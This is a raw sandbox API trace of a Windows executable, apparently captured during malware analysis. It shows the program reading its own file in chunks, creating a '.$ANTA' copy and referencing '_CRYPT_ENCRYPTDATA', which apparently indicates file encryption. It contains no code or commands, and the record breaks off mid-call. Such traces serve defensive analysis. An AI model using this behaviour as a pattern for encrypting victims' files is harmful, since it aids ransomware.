returned 0x43e2670 [0118.617] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0118.617] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.617] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.618] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0118.618] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0118.618] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0118.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0118.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.620] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0118.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0118.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.620] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\42F0.TMP.EXE.exe.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\42f0.tmp.exe.exe.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.625] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0118.625] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0118.625] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0118.626] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0118.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0118.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0118.629] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0118.629] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.631] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.633] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.635] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.636] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.639] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.640] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.642] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.643] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.646] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.648] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.649] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.651] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.653] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.655] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.656] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0118.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x50fb020 [0118.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0118.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0118.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0118.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0118.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x50fb020 | out: hHeap=0x1780000) returned 1 [0118.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.721] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x50f3020 [0118.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.736] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x50f3020 | out: hHeap=0x1780000) returned 1 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.741] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0118.741] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0118.741] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0118.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0118.742] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x50fb020 [0118.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2560 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.760] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x5201020 [0118.774] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.775] RtlAllocateHeap (HeapHandle=0x1780000, 